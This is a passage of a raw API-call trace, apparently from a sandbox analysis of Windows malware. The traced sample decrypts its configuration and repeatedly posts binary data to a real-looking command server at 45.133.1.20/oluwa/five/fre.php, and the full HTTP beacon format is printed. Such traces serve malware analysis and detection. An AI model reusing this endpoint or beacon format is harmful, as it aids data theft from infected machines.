(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.684] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.684] GetProcessHeap () returned 0x6a0000 [0236.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0236.684] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0236.685] GetProcessHeap () returned 0x6a0000 [0236.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0236.693] GetProcessHeap () returned 0x6a0000 [0236.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.694] GetProcessHeap () returned 0x6a0000 [0236.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0236.694] GetProcessHeap () returned 0x6a0000 [0236.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0236.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.696] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.703] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0236.792] GetProcessHeap () returned 0x6a0000 [0236.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0236.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.794] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0236.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.795] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.796] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.796] GetProcessHeap () returned 0x6a0000 [0236.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0236.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.800] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0236.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.802] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0236.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.803] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0236.803] GetProcessHeap () returned 0x6a0000 [0236.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0236.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.804] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0236.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.806] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0236.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.810] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0236.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.811] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0236.811] GetProcessHeap () returned 0x6a0000 [0236.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0236.816] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0236.816] GetProcessHeap () returned 0x6a0000 [0236.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0236.816] socket (af=2, type=1, protocol=6) returned 0x76c [0236.817] connect (s=0x76c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0236.844] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0236.844] GetProcessHeap () returned 0x6a0000 [0236.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0236.844] GetProcessHeap () returned 0x6a0000 [0236.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9f18 [0236.845] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.846] wvsprintfA (in: param_1=0x6d9f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0236.846] GetProcessHeap () returned 0x6a0000 [0236.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5338 [0236.847] GetProcessHeap () returned 0x6a0000 [0236.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 [0236.847] GetProcessHeap () returned 0x6a0000 [0236.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0236.847] GetProcessHeap () returned 0x6a0000 [0236.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9f18 [0236.848] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0236.849] wvsprintfA (in: param_1=0x6d9f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0236.849] GetProcessHeap () returned 0x6a0000 [0236.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0236.849] GetProcessHeap () returned 0x6a0000 [0236.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 [0236.850] send (s=0x76c, buf=0x6bd460*, len=242, flags=0) returned 242 [0236.850] send (s=0x76c, buf=0x6bb998*, len=159, flags=0) returned 159 [0236.851] GetProcessHeap () returned 0x6a0000 [0236.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9f18 [0236.851] recv (in: s=0x76c, buf=0x6d9f18, len=4048, flags=0 | out: buf=0x6d9f18*) returned 204 [0236.924] GetProcessHeap () returned 0x6a0000 [0236.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0236.925] GetProcessHeap () returned 0x6a0000 [0236.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0236.926] GetProcessHeap () returned 0x6a0000 [0236.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5338 | out: hHeap=0x6a0000) returned 1 [0236.926] GetProcessHeap () returned 0x6a0000 [0236.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0236.926] closesocket (s=0x76c) returned 0 [0236.927] GetProcessHeap () returned 0x6a0000 [0236.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0236.927] GetProcessHeap () returned 0x6a0000 [0236.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0236.927] GetProcessHeap () returned 0x6a0000 [0236.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0236.928] GetProcessHeap () returned 0x6a0000 [0236.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0236.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14a0) returned 0x76c [0236.949] Sleep (dwMilliseconds=0xea60) [0236.953] GetProcessHeap () returned 0x6a0000 [0236.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0236.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.968] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0236.978] GetProcessHeap () returned 0x6a0000 [0236.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0236.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.982] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0236.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.983] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.984] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.984] GetProcessHeap () returned 0x6a0000 [0236.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0236.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.997] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0236.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0236.998] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0236.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.000] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0237.000] GetProcessHeap () returned 0x6a0000 [0237.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0237.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.004] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.005] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.006] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.008] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.008] GetProcessHeap () returned 0x6a0000 [0237.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0237.008] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0237.008] GetProcessHeap () returned 0x6a0000 [0237.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0237.010] GetProcessHeap () returned 0x6a0000 [0237.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0237.010] GetProcessHeap () returned 0x6a0000 [0237.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0237.010] GetProcessHeap () returned 0x6a0000 [0237.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0237.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.012] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.019] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0237.029] GetProcessHeap () returned 0x6a0000 [0237.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0237.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.031] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0237.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.032] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.036] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.036] GetProcessHeap () returned 0x6a0000 [0237.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0237.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.038] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0237.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.040] CryptDestroyKey (hKey=0x6ad020) returned 1 [0237.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.041] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0237.041] GetProcessHeap () returned 0x6a0000 [0237.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0237.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.042] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0237.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.044] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0237.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.048] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0237.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.049] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0237.049] GetProcessHeap () returned 0x6a0000 [0237.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0237.049] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0237.049] GetProcessHeap () returned 0x6a0000 [0237.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0237.049] socket (af=2, type=1, protocol=6) returned 0x770 [0237.049] connect (s=0x770, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0237.076] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0237.076] GetProcessHeap () returned 0x6a0000 [0237.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0237.077] GetProcessHeap () returned 0x6a0000 [0237.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9f18 [0237.079] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0237.080] wvsprintfA (in: param_1=0x6d9f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0237.080] GetProcessHeap () returned 0x6a0000 [0237.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5578 [0237.080] GetProcessHeap () returned 0x6a0000 [0237.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 [0237.080] GetProcessHeap () returned 0x6a0000 [0237.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0237.080] GetProcessHeap () returned 0x6a0000 [0237.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9f18 [0237.081] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0237.082] wvsprintfA (in: param_1=0x6d9f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0237.082] GetProcessHeap () returned 0x6a0000 [0237.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0237.082] GetProcessHeap () returned 0x6a0000 [0237.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 [0237.083] send (s=0x770, buf=0x6bd460*, len=242, flags=0) returned 242 [0237.084] send (s=0x770, buf=0x6bb998*, len=159, flags=0) returned 159 [0237.084] GetProcessHeap () returned 0x6a0000 [0237.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9f18 [0237.084] recv (in: s=0x770, buf=0x6d9f18, len=4048, flags=0 | out: buf=0x6d9f18*) returned 204 [0237.159] GetProcessHeap () returned 0x6a0000 [0237.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0237.159] GetProcessHeap () returned 0x6a0000 [0237.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0237.160] GetProcessHeap () returned 0x6a0000 [0237.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5578 | out: hHeap=0x6a0000) returned 1 [0237.160] GetProcessHeap () returned 0x6a0000 [0237.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0237.161] closesocket (s=0x770) returned 0 [0237.161] GetProcessHeap () returned 0x6a0000 [0237.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0237.161] GetProcessHeap () returned 0x6a0000 [0237.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0237.162] GetProcessHeap () returned 0x6a0000 [0237.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0237.162] GetProcessHeap () returned 0x6a0000 [0237.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0237.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14a4) returned 0x770 [0237.165] Sleep (dwMilliseconds=0xea60) [0237.167] GetProcessHeap () returned 0x6a0000 [0237.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0237.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.168] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.176] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0237.184] GetProcessHeap () returned 0x6a0000 [0237.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0237.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.186] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0237.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.195] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.196] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.196] GetProcessHeap () returned 0x6a0000 [0237.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0237.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.202] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0237.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.204] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0237.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.205] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0237.205] GetProcessHeap () returned 0x6a0000 [0237.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0237.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.206] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.207] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.209] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.213] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.213] GetProcessHeap () returned 0x6a0000 [0237.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0237.213] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, 